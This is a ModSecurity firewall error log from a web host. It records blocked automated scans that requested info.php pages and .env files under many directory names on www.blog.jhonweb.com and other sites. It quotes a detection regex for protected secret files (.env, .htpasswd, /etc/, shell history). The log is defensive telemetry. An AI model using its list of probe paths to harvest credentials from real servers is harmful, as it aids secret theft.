[Tue May 26 14:01:58.422435 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpUQAAEXs"]
[Tue May 26 14:01:58.434323 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpTwAAEXc"]
[Tue May 26 14:01:58.444383 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpWAAAESg"]
[Tue May 26 14:01:58.450241 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpSAAAETU"]
[Tue May 26 14:01:58.455908 2026] [security2:error] [pid 578581:tid 578728] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafZm_8al1sb-umPtpXQAAEUw"]
[Tue May 26 14:01:58.534433 2026] [security2:error] [pid 578581:tid 578631] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/info.php"] [unique_id "ahVafpm_8al1sb-umPtpdQAAejE"]
[Tue May 26 14:01:58.545595 2026] [security2:error] [pid 578581:tid 578623] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/infophp.php"] [unique_id "ahVafpm_8al1sb-umPtpdgAAeik"]
[Tue May 26 14:01:58.551273 2026] [security2:error] [pid 578581:tid 578608] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/infos.php"] [unique_id "ahVafpm_8al1sb-umPtpdwAAeho"]
[Tue May 26 14:01:58.568204 2026] [security2:error] [pid 578581:tid 578664] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/laravel/.env"] [unique_id "ahVafpm_8al1sb-umPtpegAAelI"]
[Tue May 26 14:01:58.570505 2026] [security2:error] [pid 578581:tid 578647] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/lms/.env"] [unique_id "ahVafpm_8al1sb-umPtpewAAekE"]
[Tue May 26 14:01:58.588730 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpcQAAei4"]
[Tue May 26 14:01:58.615251 2026] [security2:error] [pid 578581:tid 578655] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/local/.env"] [unique_id "ahVafpm_8al1sb-umPtpfQAAekk"]
[Tue May 26 14:01:58.634405 2026] [security2:error] [pid 578581:tid 578656] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/market/.env"] [unique_id "ahVafpm_8al1sb-umPtpgQAAeko"]
[Tue May 26 14:01:58.682162 2026] [security2:error] [pid 578581:tid 578650] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/marketing/.env"] [unique_id "ahVafpm_8al1sb-umPtpgwAAekQ"]
[Tue May 26 14:01:58.708047 2026] [security2:error] [pid 578581:tid 578673] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/media/.env"] [unique_id "ahVafpm_8al1sb-umPtphwAAels"]
[Tue May 26 14:01:58.758179 2026] [security2:error] [pid 578581:tid 578835] [client 4.193.189.92:6717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ioxi-o.php"] [unique_id "ahVafpm_8al1sb-umPtpjQAAAHw"]
[Tue May 26 14:01:58.764476 2026] [security2:error] [pid 578581:tid 578644] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/new/.env"] [unique_id "ahVafpm_8al1sb-umPtpkwAAej4"]
[Tue May 26 14:01:58.784915 2026] [security2:error] [pid 578581:tid 578645] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/node-api/.env"] [unique_id "ahVafpm_8al1sb-umPtplQAAej8"]
[Tue May 26 14:01:58.843392 2026] [security2:error] [pid 578581:tid 578659] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/node/.env"] [unique_id "ahVafpm_8al1sb-umPtpmwAAek0"]
[Tue May 26 14:01:58.856610 2026] [security2:error] [pid 578581:tid 578667] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/node/api/.env"] [unique_id "ahVafpm_8al1sb-umPtpnAAAelU"]
[Tue May 26 14:01:58.960981 2026] [security2:error] [pid 578581:tid 578649] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/node/backend/.env"] [unique_id "ahVafpm_8al1sb-umPtpngAAekM"]
[Tue May 26 14:01:58.974706 2026] [security2:error] [pid 578581:tid 578670] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/nodeapi/.env"] [unique_id "ahVafpm_8al1sb-umPtpoAAAelg"]
[Tue May 26 14:01:59.000772 2026] [security2:error] [pid 578581:tid 578684] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/nodeweb/.env"] [unique_id "ahVafpm_8al1sb-umPtpoQAAemY"]
[Tue May 26 14:01:59.154029 2026] [security2:error] [pid 578581:tid 578595] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/old/.env"] [unique_id "ahVaf5m_8al1sb-umPtpqwAAeg0"]
[Tue May 26 14:01:59.217467 2026] [security2:error] [pid 578581:tid 578730] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtplwAAABM"]
[Tue May 26 14:01:59.302924 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpdAAAeiY"]
[Tue May 26 14:01:59.312766 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpcwAAejI"]
[Tue May 26 14:01:59.395075 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpeQAAejg"]
[Tue May 26 14:01:59.401979 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpgAAAekY"]
[Tue May 26 14:01:59.403572 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpeAAAejk"]
[Tue May 26 14:01:59.408033 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpfgAAej0"]
[Tue May 26 14:01:59.409829 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtphAAAelQ"]
[Tue May 26 14:01:59.420869 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpigAAems"]
[Tue May 26 14:01:59.422681 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpfwAAejc"]
[Tue May 26 14:01:59.428992 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpqQAAemk"]
[Tue May 26 14:01:59.429659 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpowAAemw"]
[Tue May 26 14:01:59.429946 2026] [security2:error] [pid 578581:tid 578642] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpiQAAejw"]
[Tue May 26 14:01:59.430988 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpqgAAemg"]
[Tue May 26 14:01:59.438015 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpkAAAek4"]
[Tue May 26 14:01:59.457530 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpsAAAekg"]
[Tue May 26 14:01:59.466638 2026] [security2:error] [pid 578581:tid 578833] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVafpm_8al1sb-umPtpfAAAei8"]
[Tue May 26 14:01:59.476618 2026] [security2:error] [pid 578581:tid 578661] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/opt/.env"] [unique_id "ahVaf5m_8al1sb-umPtpvAAATk8"]
[Tue May 26 14:01:59.490290 2026] [security2:error] [pid 578581:tid 578825] [client 4.193.189.92:3086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/in.php"] [unique_id "ahVaf5m_8al1sb-umPtpvgAAAHI"]
[Tue May 26 14:02:00.277309 2026] [security2:error] [pid 578581:tid 578784] [client 4.193.189.92:6493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/info.php"] [unique_id "ahVagJm_8al1sb-umPtp2wAAAEk"]
[Tue May 26 14:02:00.288206 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpvQAATkA"]
[Tue May 26 14:02:00.358785 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpwQAATlw"]
[Tue May 26 14:02:00.359587 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpwAAATlM"]
[Tue May 26 14:02:00.378501 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpvwAATlY"]
[Tue May 26 14:02:00.389826 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpyQAATlo"]
[Tue May 26 14:02:00.392086 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpwgAATlA"]
[Tue May 26 14:02:00.398888 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpwwAATm4"]
[Tue May 26 14:02:00.418359 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpxAAATks"]
[Tue May 26 14:02:00.419033 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpzAAATlc"]
[Tue May 26 14:02:00.422209 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpxwAATm0"]
[Tue May 26 14:02:00.423779 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpxgAATgU"]
[Tue May 26 14:02:00.425341 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpxQAATlk"]
[Tue May 26 14:02:00.425558 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpyAAATmo"]
[Tue May 26 14:02:00.429962 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpygAATl0"]
